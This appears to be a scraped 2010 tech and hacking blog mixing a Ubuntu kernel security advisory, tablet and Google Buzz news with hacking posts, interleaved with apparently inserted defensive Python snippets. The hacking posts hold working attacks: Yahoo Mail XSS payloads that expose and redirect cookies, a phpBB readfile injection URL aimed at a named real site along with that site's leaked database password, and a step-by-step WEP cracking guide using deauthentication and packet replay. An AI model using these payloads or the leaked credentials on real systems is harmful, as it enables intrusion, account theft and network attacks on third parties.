Intipadi.com – Canonical announced a few hours ago the immediate availability of a new Linux kernel security update for the following Ubuntu distributions: 6.06 LTS (Dapper Drake), 8.04 LTS (Hardy Heron), 8.10 (Intrepid Ibex), 9.04 (Jaunty Jackalope) and 9.10 (Karmic Koala). The update also applies to Kubuntu, Edubuntu and Xubuntu and it patches 10 important security issues (see below for details) discovered in the Linux kernel packages by various hackers. Therefore, it is strongly recommended to update your system as soon as possible!
The following Linux kernel vulnerabilities were discovered:
1. The EXT4 and HFS filesystems failed to check various disk structures. Because of this, a remote attacker could trick a user into mounting a specially devised filesystem and could crash the affected system or gain root (system administrator) privileges. The issue was discovered by Amerigo Wang and Eric Sesterhenn and affects all the aforementioned Ubuntu systems.
2. FUSE (Filesystem in Userspace) failed to check various requests. Because of this, a local attacker that had access to FUSE mounts could crash the affected system or gain root (system administrator) privileges. The issue affects only Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04 systems.
3. KVM failed to decode various guest instructions. This could lead to a DoS attack and crash the affected system, by triggering “high scheduling latency” in the host. The issue affects only Ubuntu 8.04 LTS, 8.10, 9.04 and 9.10 systems.
4. The OHCI firewire driver failed to handle various ioctls. Because of this, a local attacker could crash the affected system or gain root (system administrator) privileges. The issue affects only Ubuntu 8.04 LTS, 8.10, 9.04 and 9.10 systems.
5. The Linux kernel failed to handle O_ASYNC on locked files. Because of this, a local attacker could gain root (system administrator) privileges. The issue was discovered by Tavis Ormandy and affects only Ubuntu 9.04 and 9.10 systems.
6. The e1000e and e1000 network drivers for Eee PCs failed to check Ethernet frames’ size. Because of this, a local attacker on the LAN could crash the affected system or gain root (system administrator) privileges by sending specially devised traffic. The issue was discovered by Neil Horman and Eugene Teo, and affects all Ubuntu systems.
7. Random contents of kernel memory could be shown by “print-fatal-signals” reporting. This could lead to loss of privacy. The issue affects only Ubuntu 8.04 LTS, 8.10, 9.04 and 9.10 systems.
8. IPv6 failed to handle jumbo frames. This could lead to a DoS attack and crash the affected system. The issue was discovered by Olli Jarva and Tuomo Untinen, and affects only Ubuntu 9.04 and 9.10 systems.
9. The bridging netfilter rules could be modified by regular (unprivileged) users. This could lead to a DoS attack by disrupting network traffic. The issue was discovered by Florian Westphal and affects all Ubuntu systems.
10. Linux kernel memory could be leaked by various mremap operations. This could lead to a DoS attack, by consuming the entire available memory. The issue was discovered by Al Viro and affects all Ubuntu systems.
The above Linux kernel vulnerabilities can be fixed if you update your system today to the following specific packages:
• For Ubuntu 6.06 LTS, users should update their kernel packages to linux-image-2.6.15-55.82.
• For Ubuntu 8.04 LTS, users should update their kernel packages to linux-image-2.6.24-27.65.
• For Ubuntu 8.10, users should update their kernel packages to linux-image-2.6.27-17.45.
• For Ubuntu 9.04, users should update their kernel packages to linux-image-2.6.28-18.59.
• For Ubuntu 9.10, users should update their kernel packages to linux-image-2.6.31-19.56.
Don’t forget to reboot your computer after this important kernel update! To verify the kernel version, run sudo dpkg -l linux-image-2.6.31-19-generic in a terminal (this example is for Ubuntu 9.10 users ONLY; it will output the version of the Linux kernel listed above).
ATTENTION: Due to an unavoidable ABI change, the kernel packages have a new version number, which will force you to reinstall or recompile all third-party kernel modules you might have installed. Moreover, if you use the linux-restricted-modules package, you have to update it as well to get modules that work with the new Linux kernel version.
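As an added defensive check (example code written here, not part of Canonical's advisory), the following Python script encodes the fixed package versions listed above and classifies a host from a dpkg -l row plus uname -r output. It separates three states the update procedure above implies: the fixed package is not installed yet, it is installed but the old kernel is still running (reboot pending), and fully patched. The dpkg row and uname strings used at the bottom are constructed samples.

```python
import re

# Fixed linux-image package versions from the advisory above, keyed by release.
FIXED_VERSIONS = {
    "6.06": "2.6.15-55.82",
    "8.04": "2.6.24-27.65",
    "8.10": "2.6.27-17.45",
    "9.04": "2.6.28-18.59",
    "9.10": "2.6.31-19.56",
}

# Package version "2.6.31-19.56" = upstream version, ABI number, upload number.
_PKG_RE = re.compile(r"^(\d+(?:\.\d+)+)-(\d+)\.(\d+)$")
# `uname -r` prints "2.6.31-19-generic" = upstream version, ABI number, flavour.
_UNAME_RE = re.compile(r"^(\d+(?:\.\d+)+)-(\d+)-([\w-]+)$")


def parse_pkg_version(version):
    """Split a kernel package version into ((upstream...), abi, upload)."""
    m = _PKG_RE.match(version)
    if not m:
        raise ValueError("unexpected kernel package version: %r" % version)
    upstream = tuple(int(x) for x in m.group(1).split("."))
    return upstream, int(m.group(2)), int(m.group(3))


def parse_uname(release_string):
    """Split `uname -r` output into ((upstream...), abi, flavour)."""
    m = _UNAME_RE.match(release_string)
    if not m:
        raise ValueError("unexpected uname -r output: %r" % release_string)
    upstream = tuple(int(x) for x in m.group(1).split("."))
    return upstream, int(m.group(2)), m.group(3)


def version_from_dpkg_line(line):
    """Return the version column of an installed ("ii") linux-image row of `dpkg -l`."""
    fields = line.split()
    if len(fields) >= 3 and fields[0] == "ii" and fields[1].startswith("linux-image-"):
        return fields[2]
    return None


def kernel_status(release, installed_version, uname_r):
    """Classify a host as 'vulnerable', 'reboot-required' or 'patched'.

    The running kernel is judged by its ABI number only: the advisory states
    this update bumps the ABI, so a running kernel with the new ABI is the new build.
    """
    fixed = parse_pkg_version(FIXED_VERSIONS[release])
    if parse_pkg_version(installed_version) < fixed:
        return "vulnerable"
    upstream, abi, _ = parse_uname(uname_r)
    if (upstream, abi) < fixed[:2]:
        return "reboot-required"
    return "patched"


if __name__ == "__main__":
    # Constructed sample row, not real output from any host.
    sample = "ii  linux-image-2.6.31-19-generic  2.6.31-19.56  Linux kernel image for version 2.6.31"
    print(kernel_status("9.10", version_from_dpkg_line(sample), "2.6.31-17-generic"))
```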
Sunday, February 14, 2010
10 vulnerabilities in Ubuntu kernel
Notion Ink's ADAM Vs Ipad
While the iPad is all ready to be shipped across the US by the end of March, one of its strongest competitors, Notion Ink’s ADAM, is pulling up its socks for a showdown with the world’s best in innovation, to be officially announced and unveiled at the Mobile World Conference (MWC) next week.
Now you would think: what makes the Adam such a strong competitor to the iPad? Well, here it goes. The iPad has been strongly criticised on various aspects, and this is exactly where the Adam scores. The Adam uses NVIDIA’s new Tegra 2 chipset; as a result it is able to run the same hardware as the iPad effectively 2-3x longer. Add to it the Pixel Qi display and the longevity is further improved. Besides, the Adam’s Pixel Qi can display 1080p HD video whereas the iPad merely manages 576/480p. It is slimmer than the iPad (13.4mm), with two different versions at 12.9mm and 11.4mm thickness. Notion Ink CEO Rohan Shravan also hints that they can go thinner by opting for a slimmer LCD (which currently occupies 5mm of space).
They are already garnering content partnerships with various digital magazines, e-books and comics, a list which is growing as we speak. They are also planning to announce an apps competition for developers with prizes of around $1m. If these weren’t enough to tilt the balance, the Adam runs Flash and comes with USB ports.
Imagine all of this, and perhaps a little more (maybe they have something more up their sleeves), at a lower price tag than the iPad’s. For now the price point is mere speculation until the MWC. Still, you never know. Our money is certainly on Notion Ink’s Adam to give the iPad a run for its money.
Go Adam Go!!
Friday, February 12, 2010
Yahoo! Mail Beta - XSS all the way
<script>alert("Ohno");</script>
I clicked on send and hoped Yahoo hadn't been that dumb. Opening the email I found out they hadn't. Good for them. So I decided to move it up a step, and sent myself an HTML link. This is where the problem started. I wrote the word "Test" and highlighted it. I then clicked on their button to make a hyperlink. It gave me the option of choosing different types of links (ftp: etc.), but I stuck with http://. I entered the following:
http://www.yahoo.com">Here</a><script>alert("Ohno");</script>
Clicked OK, and sent the email. Upon picking the email up, I received a pop-up message simply saying "Ohno". Oh no indeed. I had to check that other things were not possible using this flaw, so I tried to view my cookie using an alert box, thinking they may have put in a check for the document.cookie command:
http://www.yahoo.com" onMouseOver="alert(document.cookie)";
I sent the email, picked it up, and hovered my mouse over the link. A second later, an alert box popped up, with information that was stored in my cookie. Thinking that I could SEE my cookie, I wondered if it was possible to SEND my cookie somewhere, or even get the user to navigate to a web page. "Sure" I thought. "Just change the code using window.location and then a website and the website should pop-up!" So I tried it out:
http://www.yahoo.com">Here</a><script>window.location="www.datastronghold.com"</script>
Once picked up, I was dismayed a little, to say the least. It hadn't worked. I was presented instead with a Yahoo error page saying it was unable to find the link. Now, I know the site is there. YOU know the site is there. So why didn't Yahoo let me get onto it? They have been clever in a little way, to say the least: it seems that only Yahoo sites can be displayed through the lower pane. Surely that'll stop any fraud sites, won't it? Of course not. A little simple modification, and the link works fine:
In case you don't know, the URL shown there is a link that I took from the Yahoo search engine, when it links to another page. Just by visiting a random page through Yahoo and trimming off the URL at the end, you can freely add your own, and the XSS script works fine! In fact, if the user tries to view any of their other emails, they can't! They are stuck with that page!
WARNING: This could lead to exploitative use, such as requesting Yahoo user names and passwords, seeing as the URL is not shown unless you view the page's properties, allowing phishing sites to fake Yahoo logon pages stating that the user's time on the email account has run out and they need to log in again. This, as well as allowing cookies to be sent to a PHP script, for example:
provides a massive problem for BT and Yahoo. I have yet to find a suitable contact at BT and Yahoo to report this to, so here it is for your educational purposes: Do NOT use Yahoo! Mail Beta. I cannot stress that enough!
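The root cause described in this post is a link builder that pastes the user-supplied URL straight into an href attribute, so a double quote inside the URL closes the attribute and the remainder is parsed as markup. The following Python is an added example (not Yahoo's code, and not from the original post) showing that naive builder next to a hardened one that validates the scheme and host syntax and HTML-encodes both the attribute value and the link text; it is tested with the two payloads quoted above. The allowed-scheme set and hostname pattern are assumptions for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Assumed policy: only these link types are offered by the editor (the post
# mentions http:// and ftp:).
ALLOWED_SCHEMES = {"http", "https", "ftp"}
# Plain hostname, optionally with a port. A quote, space or angle bracket in the
# host part cannot be a real host and is rejected outright.
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(?::\d+)?$")


def build_link_vulnerable(url, text):
    """The failure mode in the post: the URL lands in the attribute unescaped."""
    return '<a href="' + url + '">' + text + '</a>'


def safe_url(url):
    """Return the URL if it has an allowed scheme and a syntactically plain host."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None
    if not _HOST_RE.match(parts.netloc):
        return None
    return url


def build_link_safe(url, text):
    """Validate the URL, then HTML-encode the attribute value and the link text.

    Encoding with quote=True turns a stray double quote into &quot;, so it can
    never terminate the href attribute even if validation were loosened.
    """
    checked = safe_url(url)
    if checked is None:
        # Refuse to create a link at all; render the typed text, encoded.
        return html.escape(text, quote=True)
    return '<a href="%s">%s</a>' % (
        html.escape(checked, quote=True),
        html.escape(text, quote=True),
    )


def contains_markup_breakout(fragment):
    """Crude detector: an extra script tag or event-handler attribute in the output."""
    return bool(re.search(r"<script|\son\w+\s*=", fragment, re.I))


if __name__ == "__main__":
    payload = 'http://www.yahoo.com">Here</a><script>alert("Ohno");</script>'
    print(build_link_vulnerable(payload, "Test"))
    print(build_link_safe(payload, "Test"))
```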
Legal note (so I don't get sued): I provide the above information as educational information and in no way encourage or support the misuse of this information.

How to get root access in phpBB 2.0.10 hosted by free.fr
Then, you have a victim example http://romain.matu.free.fr/phpBB2/
Now go to a topic and take the topic id.
Paste: viewtopic.php?a=config.php&t=TOPICID&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Result: http://romain.matu.free.fr/phpBB2/viewtopic.php?a=config.php&t=460&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Finally, look at the source of the page, and somewhere this will appear:
<?php
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'sql.free.fr';
$dbname = 'romain.matu';
$dbuser = 'romain.matu';
$dbpasswd = 'nintendo';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
With Free.fr, the SQL database login/password are the same as for the FTP account.
FTP address: ftpperso.free.fr
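From the defender's side, the request above leaves a distinctive trace in the web server's access log: a highlight parameter that, once percent-decoding is undone twice (%2527 becomes %27 becomes a single quote), contains string concatenation and a function call instead of search words. The following Python is an added example (not phpBB code and not from the post) that scans combined-format log lines for that pattern. The log lines are constructed samples using documentation IP addresses; the suspicious-pattern list and the log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" log line: client, timestamp, request line, status.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)
# A legitimate highlight term is plain search words. After decoding, the request
# above shows a quote followed by a dot (PHP concatenation), the request
# superglobals, and a function call; none of these belong in a search term.
_SUSPICIOUS = re.compile(
    r"'\s*\.|\$HTTP_GET_VARS|\$_GET|\$_REQUEST|\b(?:readfile|include|eval|system|passthru)\s*\(",
    re.I,
)


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (%2527 -> %27 -> ')."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_highlight(uri):
    """Return the decoded highlight value if it looks like code, else None."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/viewtopic.php"):
        return None
    # parse_qs already decodes one layer; decode_fully handles the rest.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("highlight", []):
        decoded = decode_fully(raw)
        if _SUSPICIOUS.search(decoded):
            return decoded
    return None


def scan_access_log(lines):
    """Return [(client_ip, uri, decoded_highlight)] for each matching request."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        decoded = suspicious_highlight(m.group("uri"))
        if decoded is not None:
            hits.append((m.group("ip"), m.group("uri"), decoded))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses), not a real log.
SAMPLE_LOG = """\
192.0.2.7 - - [14/Feb/2010:10:02:11 +0100] "GET /phpBB2/viewtopic.php?t=460&highlight=nintendo+ds HTTP/1.1" 200 18311 "-" "Mozilla/5.0"
192.0.2.10 - - [14/Feb/2010:10:03:42 +0100] "GET /phpBB2/viewtopic.php?a=config.php&t=460&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527 HTTP/1.1" 200 18540 "-" "Mozilla/5.0"
192.0.2.9 - - [14/Feb/2010:10:04:05 +0100] "GET /phpBB2/viewforum.php?f=3 HTTP/1.1" 200 9921 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, uri, decoded in scan_access_log(SAMPLE_LOG.splitlines()):
        print(ip, "highlight decodes to:", decoded)
```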
Thursday, February 11, 2010
Cracking Wifi with Back|Track
First of all, you'll need to check and make sure your wireless card has the right chipset. Most wireless cards are programmed only to accept data that is addressed to them. Other cards, specifically the ones that are of use for wifi sniffing, are capable of picking up all traffic that is flying through the air. Common types are Atheros, Prism, Aironet, Realtek, Hermes, etc. based cards. You are on your own figuring out what type of chipset your wireless card has, as it's too vast to get into here, but check this thread for more info. You're probably just going to have to search for your specific card to find out what chipset it has, then compare it to this compatibility list. For a good discussion on types of cards that work, check this: http://forums.remote-exploit.org/showthread.php?t=2191
Next, download a copy of back|track, a Slackware distro designed for security testing purposes. This is a Linux live CD, which means it will boot the entire OS from the CD. Download the ISO and use a burning program such as Nero, Alcohol or my personal favorite, the awesome freeware CD/DVD burning program cdburnerXP, to burn the disk image to a CD. Pop the disk in, reboot, and boot from the disk. Back|track may take a while to boot up.
When back|track boots up (and hopefully finds all your hardware) you will be presented with a login screen. To quote the venerable xatar, "Read the f**king screen!" The login, as it says above the prompt, is "root" and the password is "toor" (minus the ""). Note that Linux is case sensitive. After you are logged in, you could run all of the commands I will get into later from this prompt. But that's no fun, so type in:
xconf
This should create the file /etc/X11/xorg.conf and autodetect your video settings. (With NVIDIA cards you may still have video problems, as I did, such as not getting above 640x480. Should you choose to install backtrack to the hard drive, check out http://forums.remote-exploit.org/showthread.php?t=2176&highlight=nvidia for more info on fixing this.)
To get the KDE gui desktop to start up, simply type:
startx
If everything goes smoothly, you should be awash in the beautiful glow of the back|track KDE desktop. Given the read-only nature of the live CD, you can do anything to this operating system and not have to worry about messing it up. If things get a little weird, or screwed up, just reboot and the OS is back to normal. So GO EXPLORE, run random programs, see what they do, go nuts.
At the bottom left of the screen is a little icon that looks like a monitor with a black screen. This is called the bash prompt. This is where you will be spending most of your time, so click on this to open up a new bash prompt. Note that you can double-click on the bar to the right of the tab that says "Shell" and it will create a new bash tab, negating the need to open up multiple instances of the bash window. First, a few networking commands to get you up to speed on your own system. Type
ifconfig -a
This will show you a list of all compatible network cards on your system. You should see a list of devices such as ath0, eth0, wifi0, wlan0 etc. One of these is your wireless card. If you have an Atheros based card, it will be ath0. Make a note of the name of your card, as you will be using it later. For the rest of this guide, I will be using ath0 since that is the card I have. Replace ath0 with whatever card you have.
You can also check out your wireless cards specifically by typing in:
iwconfig
I've got two wireless cards: the one built into my laptop, an Intel card (eth0), and an Atheros PCMCIA card (ath0). Now that we have the names of our wireless cards, we can start sniffing. Some like to use Kismet to sniff for networks, but I find using airodump-ng to be easier and ultimately more effective. In your bash prompt, type:
airodump-ng --write out --ivs --abg ath0
This starts airodump-ng and tells it to begin sniffing data, write it to the file out, only capture IVs (Initialization Vectors), and search the a, b and g bands using the ath0 card. Keep in mind, every time you specify the same output file name, such as "out", airodump-ng will append "-##" to the file name, such as out-01.ivs, out-02.ivs, etc. You will see a list of access points on the top half of the screen, and clients on the bottom. Find your access point in the list. Write down the BSSID or MAC address of the access point and any connected clients. You'll need it later. From now on in this document, the access point's MAC address will be referred to as APmac and the client MAC as CLmac. The goal of the attack is to capture as many unique IVs as possible. Every time data is sent between the wireless access point and client, each packet contains an IV; these are collected and then run through the aircrack-ng program for computation.
You should be seeing a ton of numbers flying by, but not updating very quickly. That's because airodump-ng is searching all channels. Once you see your network, note what channel it is on (under the CH header). Stop airodump-ng by hitting:
ctrl-c
Now start it up again, but this time we will add --channel # where # is the channel number of the access point, say, channel 6:
airodump-ng --channel 6 --write out --ivs --abg ath0
Airodump-ng should be running much faster now, and updating constantly. You will see a number rising very quickly; this is generally the beacons. Beacons just basically say "hey, I'm an access point" about 10 times a second. You can judge the quality of your connection by how fluid the rise in beacons is. Other than this, they are useless for our purposes. For this type of attack it is important for there to be a client connected to the access point. So march over to your other computer and log on to the net wirelessly. In backtrack, you should see a client pop up at the bottom; the first MAC is the access point and the 2nd is the client. Write down both. Open a new bash prompt and type:
aireplay-ng -2 -b APmac -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -p 0841 -h CLmac ath0
Where APmac is the MAC address (BSSID) of the access point and CLmac is the MAC address of the client. For a detailed explanation of what all these settings do, open up a new bash prompt and just type aireplay-ng and it will spew out all the controls and what they do. The only one not explained is that the very first -2 tells aireplay to do the 3rd attack method in the list at the bottom (the first being 0).
aireplay-ng will now start sniffing for a certain type of packet, with a length of no more and no less than 68 bytes, between client and access point. It will say "Read ### packets". At this point, if there is significant data transfer between the client and AP, it may snag the right type of packet already and there is no need to do the next step. In this case, hit Y to use the packet and skip the next step. If however it keeps reading packets for a while (more than a couple of minutes) and does not pop up saying "Use this packet?" then do the following:
Open a new bash prompt and type:
aireplay-ng -0 1 -a APmac -c CLmac ath0
This command will effectively terminate the connection between the AP and the client, forcing the client to re-connect. It is this re-connection packet that we are looking to scoop up with the first instance of aireplay.
Go back to the first instance of aireplay and you should see something at the bottom of the screen saying "Use this packet?" Hit Y and aireplay will start sending out tons of packets to the AP. Switch over to airodump-ng, which should still be running in the first bash prompt. Look at the data rate of the targeted AP. If all is going well, aireplay is spewing out packets like mad to the access point and airodump-ng is picking up the chatter in between, so the data count should be rising quickly. This is exactly what we want.
If for some reason the data isn't going up quickly, go back to the first aireplay-ng and hit:
ctrl-c
If aireplay had picked up any more packets, it will prompt you again asking if you want to use them. Try more packets. Also, you may need to get closer to your access point or try the aireplay-ng -0 method again. Experiment. Once you've got the data rate going up quickly, start aircrack-ng and start crunching the numbers. Type in
dir
to get a list of the files. One file should be the out file that you specified in airodump-ng, specifically out-01.ivs. Each time airodump-ng is started with the same output file name, it creates a new one, tacking on -01, -02, etc. Make sure you know which one you are outputting to.
Type in:
aircrack-ng -f 2 -a 1 -b APmac -n 64 out-01.ivs
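Seen from the access point's side, the two aireplay-ng steps above have recognisable signatures in a monitor-mode capture: a burst of deauthentication frames carrying the AP's BSSID (the -0 step), and a burst of data frames of identical length from one station (the -2 replay, which re-injects the same 68-byte packet). The following Python is an added example (not part of the tutorial or the aircrack-ng suite) of a sliding-window detector for both bursts over a constructed, pre-decoded frame trace; the thresholds and the MAC addresses are assumptions.

```python
from collections import defaultdict, deque

# Thresholds are assumptions for illustration; tune them to the environment.
WINDOW_SECONDS = 1.0
DEAUTH_THRESHOLD = 5     # deauth frames per second carrying one BSSID
REPLAY_THRESHOLD = 50    # same-length data frames per second from one station

# Constructed frame record: (timestamp, kind, bssid, source_mac, frame_length).
# kind is "beacon", "data" or "deauth"; a real capture would be decoded from
# the 802.11 header (type/subtype, addr1-3) of each frame seen in monitor mode.


def detect_bursts(frames):
    """Return [(timestamp, alert, key)] for the first crossing of each threshold.

    frames must be sorted by timestamp. One sliding window is kept per key:
    deauth frames are keyed by BSSID (the -0 step sends deauth frames carrying
    the AP's address), and data frames by (source, length) because a replay
    re-injects one captured frame, so every injected frame has the same sender
    and the same length.
    """
    windows = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, kind, bssid, src, length in frames:
        if kind == "deauth":
            label, key, threshold = "deauth-flood", bssid, DEAUTH_THRESHOLD
        elif kind == "data":
            label, key, threshold = "replay-burst", (src, length), REPLAY_THRESHOLD
        else:
            continue  # beacons and other management frames are not rate-checked
        window = windows[(label, key)]
        window.append(ts)
        while ts - window[0] > WINDOW_SECONDS:
            window.popleft()
        if len(window) >= threshold and (label, key) not in alerted:
            alerted.add((label, key))
            alerts.append((ts, label, key))
    return alerts


def sample_capture():
    """Constructed trace: normal traffic, then a deauth burst, then a replay burst."""
    ap, client = "00:11:22:33:44:55", "66:77:88:99:aa:bb"   # placeholder MACs
    frames = [(t * 0.1, "beacon", ap, ap, 100) for t in range(100)]          # 10 s of beacons
    frames += [(0.5 + t * 0.8, "data", ap, client, 68 + t % 5) for t in range(10)]  # ordinary data
    frames += [(10.0 + t * 0.05, "deauth", ap, ap, 26) for t in range(8)]    # 8 deauths in 0.4 s
    frames += [(11.0 + t * 0.01, "data", ap, client, 68) for t in range(100)]  # 100 x 68-byte frames
    return sorted(frames)


if __name__ == "__main__":
    for ts, label, key in detect_bursts(sample_capture()):
        print("%.2fs %-13s %s" % (ts, label, key))
```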
Wednesday, February 10, 2010
Milw0Rm Hacking Papers And Videos - Rapidshare Links!
...greetz to str0ke....!!!!!!!!!!
GOOGLE BUZZZZZZZZZZZZ
It’s official: Google has just announced Google Buzz, its newest push into the social media fray. This confirms earlier reports of Gmail integrating a social status feature.
On stage revealing the new product was Bradley Horowitz, Google’s vice president for product management. While introducing the product, Mr. Horowitz focused on the human penchant for sharing experiences and the social media phenomenon of wanting to share it in real time. These two key themes were core philosophies behind Google Buzz.
“It’s becoming harder and harder to find signal in the noise,” Bradley stated before introducing the product manager for Google Buzz, Todd Jackson.
Here are the details:
Google Buzz: The Details
- Mr. Jackson introduced “a new way to communicate within Gmail.” It’s “an entire new world within Gmail.” Then he introduced the five key features that define Google Buzz:
- Key feature #1: Auto-following
- Key feature #2: Rich, fast sharing experience
- Key feature #3: Public and private sharing
- Key feature #4: Inbox integration
- Key feature #5: Just the good stuff
- Google then began the demo. Once you log into Gmail, you’ll be greeted with a splash page introducing Google Buzz.
- There is a tab right under the inbox, labeled “Buzz”
- It provides links to websites and content from around the web. Picasa, Twitter, Flickr and other sites are aggregated.
- It shows thumbnails when linked to photos from sites like Picasa and Flickr. Clicking on an image will blow up the images to almost the entire browser, making them easier to see.
- It uses the same keyboard shortcuts as Gmail. This makes sense. Hitting “R” allows you to comment/reply to a buzz post, for example.
- There are public and private settings for different posts. You can post updates to specific contact groups. This is a lot like Facebook friend lists.
- Google wants to make sure you don’t miss comments, so it has a system to send you an e-mail letting you know about updates. However, the e-mail will actually show you the Buzz you’ve created and all of the comments and images associated with it.
- Comments update in real time.
- @replies are supported, just like Twitter. If you @reply someone, it will send a buzz toward an individual’s inbox.
- Google Buzz has a “recommended” feature that will show buzzes from people you don’t follow if your friends are sharing or commenting on that person’s buzz. You can remove it or change this in settings.
- Google is now speaking about using algorithms to help filter conversations, as well as mobile devices related to Buzz.
The Mobile Aspect
- Google Buzz will be accessible via mobile in three ways: from Google Mobile’s website, from Buzz.Google.com (iPhone and Android), and from Google Mobile Maps.
- Buzz knows where you are. It will figure out what building you are in and ask you if it’s right.
- Buzz has voice recognition and posts it right onto your buzz in real-time. It also geotags your buzz posts.
- Place pages integrate Buzz.
- In the mobile interface, you can click “nearby” and see what people are saying nearby. NIFTY, if I say so myself.
- You can layer Google Maps with Buzz. You can also associate pictures with buzz within Google Maps.
- Conversation bubbles will appear on your Google Maps. They are geotagged buzz posts, which lets you see what people are saying nearby.